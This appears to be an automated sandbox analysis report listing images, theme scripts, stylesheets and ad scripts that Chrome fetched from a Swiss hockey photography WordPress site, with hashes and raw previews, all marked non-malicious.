                                                                                                                                            Preview:/*! elementor - v3.5.6 - 28-02-2022 */."use strict";(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[819],{9220:(e,t,n)=>{var i=n(7914);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var s=i(n(8135));class _default extends elementorModules.ViewModule{constructor(...e){super(...e),this.documents={},this.initDocumentClasses(),this.attachDocumentsClasses()}getDefaultSettings(){return{selectors:{document:".elementor"}}}getDefaultElements(){const e=this.getSettings("selectors");return{$documents:jQuery(e.document)}}initDocumentClasses(){this.documentClasses={base:s.default},elementorFrontend.hooks.doAction("elementor/frontend/documents-manager/init-classes",this)}addDocumentClass(e,t){this.documentClasses[e]=t}attachDocumentsClasses(){this.elements.$documents.each(((e,t)=>this.attachDocumentClass(jQuery(t))))}attachDocumentClass(e){const t=e.data(),n=t.elementorId,i=t.elementorType,s=this.documentClasses[i]||this.documentClasses.base;this.documents[n]=ne
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):4318
                                                                                                                                            Entropy (8bit):7.888705827712728
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:1C42350B82B8E4936CFC78552D7BF60E
                                                                                                                                            SHA1:7B860431A4F1D1F6AB5D64B8DA387FC88E6A343C
                                                                                                                                            SHA-256:7C7128997DF0095241273C5E6320C4E93CF5BD3AD97F6DA6B55BFA260551705F
                                                                                                                                            SHA-512:942C408B66DD6C609E2F4D4FB28161465A3C957B2B882BAD44D7A68F5B19724CC4C6BFA03DFE6A0419BFB4B86EAFB39AE2CE2A87318A3DB716AF0FE28C473A70
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:130/h:90/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/08/IMG_9135.jpg
                                                                                                                                            Preview:RIFF....WEBPVP8X...........Y..VP8 .....;...*..Z.>.8.H%."!2\.(...@......C.5og....`>.=.....Y.p..k=.|T...r}.2o.F..........R..._...~..cc.g...W.?..r......=.?..X..........F.........O/_R..|..>......L......[,._.i.4P..tP...c..:.X......r.Aef.n&.#...L.u&....O.M...K'........7|x~.+..@k......."...9....91........'45l........w..s#Xte..d....v}=.]0...j....qPH3..,q....}.1K.3..l.......Mo.Yh..I.N.0e....*{...@..4.....%|....=._.&Q.!...0....P...o=C...t.......K>e,.c.|]!.#.....q^[..m.:AH.W(.`.o.....P.mm/.g k.......7F.]..b0m..Jc\6.i..p.........Hw..........|-...M......<".3...p.R.._a....J..5.$.m..)<*..,....4.2...z..a.K.pn...u.ru.V7.X.;.S..........f2s...3....1.*SOS...l.J$~de.Hy.@i!;3Kz@.._=._5Q1..Xx+.%Fe..U...&)L#....H...~....T.r..3},R.y.%.......G.]ed.R.q..}.V.j.l^.-N6.`j.#.......-.....O..@?.Q{W..."..c....Qi.......km.}..;.Gk.<..cK...PT...?..r......w.df.......Mh..aM|....K/#.....<{.0u..,K&E....6.T{..l..|.0./`.K..&..zP..S8.}....l........I.N...."K6_FI.]%.1...v
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):7764
                                                                                                                                            Entropy (8bit):7.951436698258612
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:1023E37147609246D640B140172C4A05
                                                                                                                                            SHA1:2B100833299B59CEC55D894087DC1E557C0D71C4
                                                                                                                                            SHA-256:7245A25CFE3A7FF54161575CB064A7F7A892577A1F7C31A3D169883DCB0C3E5D
                                                                                                                                            SHA-512:6FAA06DFFA6ECC2628127072E11200C7C8914EF64FE3AF618DE3AA838815D87B4CBAAABAA7F5FB0CEBFCF456CBA6D33B608F78DD17CBA38953CB8F0C95E1087A
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:392/h:272/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/09/pac-2.jpg
                                                                                                                                            Preview:RIFFL...WEBPVP8X..............VP8 l.......*....>.D.K......k....in.nq.....o..F._..3..?.sn.C0..Y..Y?......^.U...r...........6d~...?.iD.....wv+.....?.4=..z...J..a.|.,<...8%......I...D.2:..?...u.......a>.[..k.m.O....Bk"..u....J.|X...H..xQ..lS.h.qY....-'..s.{V......!A..g..g,....h..N...h.a.....t...&S0...>S....'. .PsN.@...g.S..?.O.h..s....N,#..a.S .$.._.<\..b..t. ..7t.>-.........w...).Z..F...Kg>..H....V]...[U.`.......'i:..xAqBu?..;vX.E..>...e..9.I.....$......k..&..........W..W....!..3*...Y...L/...Oh......P......!p."..>..B.S@.).(.wt....a..z&..;2E.....5.T.<VQ...S..dZ........^...%.g)..&...`....e.=.o:.<G........?Lc.......p.......3..g^4V...b..=..[..Q..T.O ...iTT .E....;...4.E6..-..k...|,..&...sB..b......;.=..d.PQ.W..&....V...a."......79u....w..*....E.....}.=%..5g| ..L......~\d.....V.H.....xQP.+....e..:.p.........'x.]]&]7.@.M)q.....N;..+..~E.N...1+...*5.4...!|...dM...E..*-.2...no=...,........X...N...~...0.>..(c.o.....#o.._.Y.Xl.t0.e..e...o\d.'..n
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (54025)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):55320
                                                                                                                                            Entropy (8bit):5.738397914892455
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:E1F6544D45CAAA19740D75414B8280C8
                                                                                                                                            SHA1:1E927495D95C34823D834B354EA2BCD4447A1CDF
                                                                                                                                            SHA-256:4A9932A6C84A812A20610D8AD917FC9F52D73FF9BA53B77A63E708944FCA9208
                                                                                                                                            SHA-512:A5F1CAD462E4D33DF4C67A3392670F7D981EBBB191D015D32C5E2CEA071614C59AA5FFDCBD795CF527E280DA2ADE6AC68C52639E7F80CFE17E898B7C3EC6435C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview://# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==.(function(){function v(U){return U}var R=function(U,b,c,Y,u,K,l,P,p,D,Z,d){for(d=c,Z=13;;)try{if(d==82)break;else if(d==38)d=P&&P.createPolicy?Y:43;else{if(d==88)return Z=13,p;if(d==Y)Z=b,p=P.createPolicy(K,{createHTML:w,createScript:w,createScriptURL:w}),d=88;else if(d==c)p=l,P=F.trustedTypes,d=38;else if(d==34)Z=13,d=79;else{if(d==43)return p;d==79?d=F.console?U:88:d==U&&(F.console[u](D.message),d=88)}}}catch(h){if(Z==13)throw h;Z==b&&(D=h,d=34)}},F=this||self,w=function(U){return v.call(this,U)};(0,eval)(function(U,b){return(b=R(70,48,53,35,"error","bg",null))&&U.eval(b.createScript("1"))===1?function(c){return b.createScript(c)}:function(c){return""+c}}(F)(Array(Math.random()*7824|0).join("\n")+['//# sourceMappingURL=data:application/json;ch
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 130x90, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4268
                                                                                                                                            Entropy (8bit):7.780695507571187
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:5101581506EC2C911B1831C94B957002
                                                                                                                                            SHA1:4A5A5D0C8F7928D02D27AF267ADCD31E7B3EA350
                                                                                                                                            SHA-256:9C4B9177FD4EB51DAD7D31D8E36BCCDB3EC811F9547946D6A4FE756A737533F2
                                                                                                                                            SHA-512:7B67B8817E6DE78587803105F08CE8C6FD4391596AC53CD5257841CB1E4887F533BA8D1A16E7EAAE7C22A9F159CCDF5014E3A5CDD735C142EB8544C9B73E202A
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100................................Z..........C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.......Z...."...............................................................................5).....{..j.geSi....=.....0.........<.B#...9&.M......_\.....o...No.q........X.q8.s..(..Y...gr....U..6.t.......93..x...Z7O+.2.cg(.x.k.VT.Q.<{.(~....M.YX..c....^..Q.Y..A..A.....}...r....S..>.......vs.[K...b%..2.R....WB...~...3%..n..nZ..V.;#%.z..c.d..4.....'.............................!.. 1A."..........~.;..>H.....ko~X......L....eJ..0..2...b.<.....P9L.?".. .X...0.d4..H..e..%.6-W...y.....m...i&PcG."T..c4.d.....C$=.1.....M..r.N.(...9......4Q.R.g..#j.1.I.:.!l;D..oZ.....t.Y3+v..o....k...R......./.....].u.....n..c.C..km..........z..;.%^..$.j.. .6
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):34582
                                                                                                                                            Entropy (8bit):7.991669038734057
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:A34810D0DA81AC9EEBA700BA5277DC7D
                                                                                                                                            SHA1:3F7FC1ECC273CCEBC7C56BBDCF57CB22A28315A1
                                                                                                                                            SHA-256:70CA7E0251A08618106CCDE2C7D50BD4DC88DF6171C5DC3D199EEF070432B2DD
                                                                                                                                            SHA-512:FFF3A2BCDD9DAA4A90A7294A743091AE76F0B833D3A03AB1FCBB8A46820B36613D813075960D22E1B87283EFB3C8B90D1B211CC13074A50919B92BB608C3A6CA
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:800/h:445/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2025/01/IMG_2037.jpg
                                                                                                                                            Preview:RIFF....WEBPVP8X..............VP8 ....0^...* ...>.F.J...)..A0..M.zW..A.....S.O`.T.....(^.................h}....k..=u..@~......O........}+.....v....G..._.=r~..m...x~&.u?t}..y..O.|.|..o..x}......).[....j..........nW..?f.>?..._.}.................~..C.....a/...:.za.FDC.=....U.j.S.dP..e..,7.e.,PaZ.._.3R./...V.l.}1U..O...B......DX...+..d .......UL.b...7..{g\...p8^f4....L./..5..'...m...&.L?.^.......>..f.....F.Dg...".Y{..fsx.Yhu#.<;..-eC...].....L...9l..G..Y.2..U..m...&.]..e.W@.jA).B...V.\..I\...o...~.N..]. _.....s..Q...G...m.....qX......V..H.+......G...ps.....B.g..BM..D...@....bdJ.-.....t...I/.kh-n.\.q..-.;..A..3O.N.....k.#.E..I0D...7.BWe_.....Z.j.+...>....kS.`...8.".~.E.tu..{.P...vN.K....u..S....uV.....l..n@...v....$.m...*..q.w...k.j.?..5..u.o..[.....t{.a...}.`LA.H..A......?1h.d.r6IT-..G7....+@1...........~.N..F./..gF..xVm.7$N......g....eq_.6.o.. o......U...6...S..jz....V...zD..AK.._.u...?:.~VD@&.T..&.N`|{..N..f!........].f...n..;y4.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):16
                                                                                                                                            Entropy (8bit):3.75
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:FA9C17CE126A76733ACA269345EB7D47
                                                                                                                                            SHA1:F1D8AA71F281509D55041F671B1A7BD94524AAD8
                                                                                                                                            SHA-256:15F88A501BBE49A103551BA087FE6FC7E101894E71C3A74A42E8EFC07DCEC0D8
                                                                                                                                            SHA-512:DD2E08D8D294E24330DDACFCC602D5AB9C9BD65346E0C6540F599725AB711E1F1621D3939318BFC069E67CEF889B80E781DA3E935D61C26E2086DAC79428818C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAm17vWsODHf0BIFDRM0Cs4=?alt=proto
                                                                                                                                            Preview:CgkKBw0TNArOGgA=
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (1354), with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1354
                                                                                                                                            Entropy (8bit):4.926631309935263
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:88FDD9B062B886D5F54EE54452FA8769
                                                                                                                                            SHA1:B4DD00345C23E3A27BED02717BF983E713856C40
                                                                                                                                            SHA-256:6482AD3A544871923DE537272E1E863DC1E1FBDF060C17E0B3EDF0FD6AF67A67
                                                                                                                                            SHA-512:DC84B9DD5E520D10E2DB1938FC71FFB0B16472934BA1FCD49F4FED143702A372FE870E7092D9AD0814B5A54108A06530A586ED270C8259B190557001E892B1C6
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:jQuery(document).ready((function(){var t=jQuery(".tg-ajax-btn-wrapper");jQuery(t).each((function(){!function(t,r,a,e,o,n,d,i,u,g){var l=1,s=colormag_script_vars.no_more_posts,c=r,y=e,h=a,j=o,Q=n,_=d,p=i;jQuery(t).on("click",(function(){l++,jQuery(g).show(),jQuery(t).attr("disabled",!0);var r={action:"get_ajax_results",tg_nonce:colormag_load_more.tg_nonce,tg_pagenumber:l,tg_category:c,tg_number:y,tg_random:h,tg_child_category:j,tg_tag:Q,tg_author:_,tg_type:p};return jQuery.post(colormag_load_more.ajax_url,r,(function(r){var a=jQuery(r);a.length?(jQuery(u).append(a),jQuery(g).hide(),jQuery(t).attr("disabled",!1)):(jQuery(g).hide(),jQuery(t).attr("disabled",!0),jQuery(t).html("<span>"+s+"</span>"))})),!1}))}("#"+jQuery(this).children(".tg-front-post-load-more").attr("id"),jQuery(this).children(".tg-front-post-load-more").data("category"),jQuery(this).children(".tg-front-post-load-more").data("random"),jQuery(this).children(".tg-front-post-load-more").data("number"),jQuery(this).children("
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 392x272, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):18855
                                                                                                                                            Entropy (8bit):7.960727845548336
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:685FD73F266F7531F3CA1E845C1E6EC7
                                                                                                                                            SHA1:9818675E99E67A8784A4BBEBCFF364021FB2450D
                                                                                                                                            SHA-256:670490A636D9E79B3CA53EC05794ABB240696C4509221DDB595D8790EC7C4535
                                                                                                                                            SHA-512:9CF23494391B1236C2122EDD3909AABC77AE9A8F7B0FFDCA07FB782D47A1045EBDC757ACB1AD175FC12A61DD55EBDD24A9ED135E1BBD61AC37253785CFE425E5
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100...........................................C.............................'......'#*" "*#>1++1>H<9<HWNNWmhm......C.............................'......'#*" "*#>1++1>H<9<HWNNWmhm.............."......................................................................................0..f..Z.. .Fe..h....+.-c^)Z+..".....,"..[..#......w..n.=...c......../.o...\0....uA..6...vVY..S.dYk.Yg.K,.Q-.X6.....P........:0...R..)..u.X.).).M...F...J.^.../r.H,.u.y.Xo.^.....h. .m.q0....!...0K\.?K.Z:.....t...3.j.....,..$...Dem..y.!.........R....2Q.E...g.7.....t..2.t..U*F.JTy....s;3.9h.v.....a.....p...1.U]P..#;}<M+-#..A.... .P..... .I..8.B.cC...%.p.F..V..Q.}l..t....YZ...L.iT.Ne.^...J.d6.::.}..D._.@C.v.O./.r..)....=..Y..~;..ZLJ.(W'.Sl.....7.E.gF....UC.z.:b.....{.....W.Ud.....K^.y.7..=.c.y.a_gw.....V..v}....Gu..U.#9.89WeBV._da....G
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (327), with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):327
                                                                                                                                            Entropy (8bit):5.027385959831815
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:B7B6E579A57C814B14A614D68CE77E57
                                                                                                                                            SHA1:D12679187A5F852BFF1623C3D865D900D432F648
                                                                                                                                            SHA-256:A8C2B783DFB2A8AE80F75F9B271024777EF513E93FE8B220C0DF95ED8FE3A4A0
                                                                                                                                            SHA-512:503B13B6C8165ADECE8073601109DAD0F6A1CA0EA4724ABC43900E5975E2755C47E5F8A2DA47AB54E74448A6515480B44F7149F15E8D9726847C462790A20C9F
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:/(trident|msie)/i.test(navigator.userAgent)&&document.getElementById&&window.addEventListener&&window.addEventListener("hashchange",(function(){var t,e=location.hash.substring(1);/^[A-z0-9_-]+$/.test(e)&&(t=document.getElementById(e))&&(/^(?:a|select|input|button|textarea)$/i.test(t.tagName)||(t.tabIndex=-1),t.focus())}),!1);
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 130x90, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4326
                                                                                                                                            Entropy (8bit):7.784774834862605
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:8D1F85214C1B4626B697B0FBB03285B0
                                                                                                                                            SHA1:8751481D7857E6A69FE36D1E7C5CF32504A97122
                                                                                                                                            SHA-256:8E9FB60D0F14B23F31422239CCEF7AAEC64684E8463E40A2FA869F8C0AC61919
                                                                                                                                            SHA-512:F9A1E9AF61B1DB62AD3ADA83EE8D1DC81FA64E5F37B1A1CB10C395F656C8814621907BCFDE06AE1F4244D79E96BAC60EC718ADE9AF536BD73073EB8E9593B67E
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100................................Z..........C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.......Z...."...............................................................................?Z..*.X#.......m..7W..y.....!R(.......O.\..]..[..%&X...+.O..q}......>...x...8...U....{..:p|a...eyT.4/..<.Zd.T"...:(.......g...*.E.Cp....YG..-..6.>t.rdm..|..<.M.|....|...c;.2..I..y>..p.J.i...k......+.......!.~peG.Oj"7.w.#...E,y..z....Xa._........{.|._!....S......+.............................!"..#1 %4ABC............C&.E....QA....c..EU@.&J""x.3..GQ"Rl.....(......0.7..~...9.N..(.Myr+R7...L.t...9.....1.d..L..`.M.x\.D....b ."j.>.P...sA....'.j....r...v...=..N..Yg...FEq:Y!4...J. ..;.j..V.....3.....3.7.....s...."..?Ku*....B.............Z.Ui..v........Y=z.(.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (52275), with CRLF line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):102959
                                                                                                                                            Entropy (8bit):4.782753462479265
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:D9AEF981A0D39AC79A7C3A90EF1CDAC1
                                                                                                                                            SHA1:5E57CA2193F1AF43BB97CEE9FC125823231B41AA
                                                                                                                                            SHA-256:8281CC590AFDE6D82909FB8866E583E72D88E6B856B61510A5EC4C19EC1089B6
                                                                                                                                            SHA-512:FABB948B67BF47DFC693BED895363F4E6400E88956FF9C8EC4E85DF69F4450DCB6414110F6A11E80045EB10D8CBA99241EBE5877AE1BDA64E7D77893C56E43BC
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/themes/colormag-pro/assets/library/font-awesome/css/all.min.css?ver=6.5.2
                                                                                                                                            Preview:/*!.. * Font Awesome Free 6.5.2 by @fontawesome - https://fontawesome.com.. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License).. * Copyright 2024 Fonticons, Inc... */...fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-classic,.fa-regular,.fa-sharp,.fa-solid,.fab,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-family:"Font Awesome 6 Brands"}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 392x272, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22584
                                                                                                                                            Entropy (8bit):7.963283705010493
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:2FC6043BF18D39306A49B84E3F49C91F
                                                                                                                                            SHA1:4D2DF9AAB7D5CE9796340EF0C8D797DF48CFC445
                                                                                                                                            SHA-256:8BC9775C379D0F2ED4895CA52DA832816C3FE9E78EBC6AD24737B63ABDB424D7
                                                                                                                                            SHA-512:7432E06D9E1DC0007A6E1A1D6687454B5F3774223A73366DC1EC54F6D8B77094E7B84DB70F947E2ABA7908F865E23D1B7244462B5E0245C03FFA3586FEB4F3BC
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100...........................................C.............................$......$ &...& 9-''-9B747BOGGOd_d......C.............................$......$ &...& 9-''-9B747BOGGOd_d.............."................................................................................|'..J.....i.Z..nI..z....d.e.}.Z..J..8h.]K.$X..[.s..bx.7.......J).D.D...B..)..y.7x..d.{un.#..f.j..{...e.x+.;..nvI..@K^.....E.f.nC.....KZ.}..9N...:7U.......3Q1N.rM..i.....i.....M..v2.v..wX.eR..n.N]y.w.~...M>.k8;.vy9U..A>]...Kw.M.......k%.~.[...I..`..cs.j.n.V.:f.=.Z.y..;..;..jv.<.F...#.=......kN.`..#.....ljr.G,..Q.X..WG.A..u.i..2_..~......AN...S...&..Q......p:....:....Jy.......SZ....j.I......y.....l.^.3.l..w..dPXS..R..n........]g....,...8.n.3...f.....gu,..wi...m..E.!>v..fZ.i[."..ds.$....(..M....eh...*e.......*09f.....G,..$h..
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 392x272, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):21763
                                                                                                                                            Entropy (8bit):7.960710980760898
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:15C71FE6ED6955C22D04307C4C657C0E
                                                                                                                                            SHA1:EC08842DF6049B157CD2E62054266309C0F1E6B8
                                                                                                                                            SHA-256:7CD35F87CDE8C44D00742235780D4656417DB60E68A1913262A6B5A578FEEBD6
                                                                                                                                            SHA-512:8C2FF2A85D464DCEA301D591B405BB7C4E2B0D070EDBBF054B0F104EC30D22E055DF55074AF09747D9B7A8A38732005A9B58B009D80B79EAA14518F20947CD27
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100...........................................C.............................$......$ &...& 9-''-9B747BOGGOd_d......C.............................$......$ &...& 9-''-9B747BOGGOd_d..............".................................................................................w....LY.s..L..b&C....0M.....;F..k..P.c....J.s...Z^.v..=.!.I.g..p.jyj.Z.3u$L.'.@...BJ.b.AD...I.l......W. .]s.s.S....[.ON.(.h:.*.z.Y....+..<..d:.UD.z.93..h. .=.]..: KW..e...g.=..h-y...=...7..=\..Y..3..N.w........ht:...nS....u..P..yv2vJ^...Z......{b."...2..7=.........Sf.....J&..1].uH...tVE...........l........t6.~s.T6.\s:..:...Z.m1,C...V....".s...f.......K%c..n.z....B.;./E..;...5.s}-).d...........[Z./.=.r.v.q.w^W#+W]..1:..So.(x...F...]-le..dH...r.V..r...$.l........8?F......[..7(.^R.W3..H.......zNm7../.....>.2.m..........>I....-b...E.3..[...#
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (323), with CRLF, LF line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):9928
                                                                                                                                            Entropy (8bit):5.0548443111285435
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:CC7E714A00AD4F78D74A3C13E8D73E02
                                                                                                                                            SHA1:19A7AD9A104410D30B84FC2D4916D7918BADEC18
                                                                                                                                            SHA-256:F0789D0A22FF0DF16F2A378CC93C82711CB77AEFEB87C0F38DCDB93F0B183CE8
                                                                                                                                            SHA-512:6BAAF44077E16DE0228A2DB8028913626471EFE2F441CB152B33C9AC1FAE211A2C3BFCFCDBD424FD416C9A9610E77DCC1E6963F4F894F7ADEBD8F484996856B8
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://gbucket.ch/CH/ch_config_desktop.js
                                                                                                                                            Preview://Config Function Scope....var checkE = 0;..var access_token;....var gBucketId = "120";....function getParentUrl() {.. var isInIframe = (parent !== window),.. parentUrl = null;.... if (isInIframe) {.. parentUrl = document.referrer;.. }.... if (parentUrl === null || parentUrl.length <= 0) {.. parentUrl = parent.document.URL;.. //parentUrl = window.parent.location.href;.. }.. if (parentUrl === null) {.. parentUrl = window.parent.location.href;.... }.. return parentUrl;..}....if (typeof (googletag) == 'undefined') {.. var googletag = googletag || {};.. googletag.cmd = googletag.cmd || [];..}....if (typeof(gbconfigfile120) == 'undefined' || gbconfigfile120 == false){.... (function () {.... //global Variables.. setgbprotocoll = 'https:' == document.location.protocol;.. setgbprotocoll = (setgbprotocoll ? 'https:' : 'http:');.. setgbhost = window.location.hostname;.. setgbhref = encodeURIComponent(window.location.href);.. setgbasync = false;..
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):47294
                                                                                                                                            Entropy (8bit):7.995185829177809
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:33C341CB7692BD6D6A8AE66E895C9BBA
                                                                                                                                            SHA1:2409DF136FFB31559A71206DF1136B7ED20BD4D6
                                                                                                                                            SHA-256:647C6A5EE07C935D5DCDD1FBBFB994AE9517CE465E864B8672BEF8A68656ACAC
                                                                                                                                            SHA-512:9F896FB3FAA68F516556BB1215B271FD1D2B69EF93A26004785ECFC68C0E97FC9858313214678EB3B1A37942CFC525EA06345916E69AD58A21D939027128270E
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:800/h:445/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/12/IMG_2614.jpg
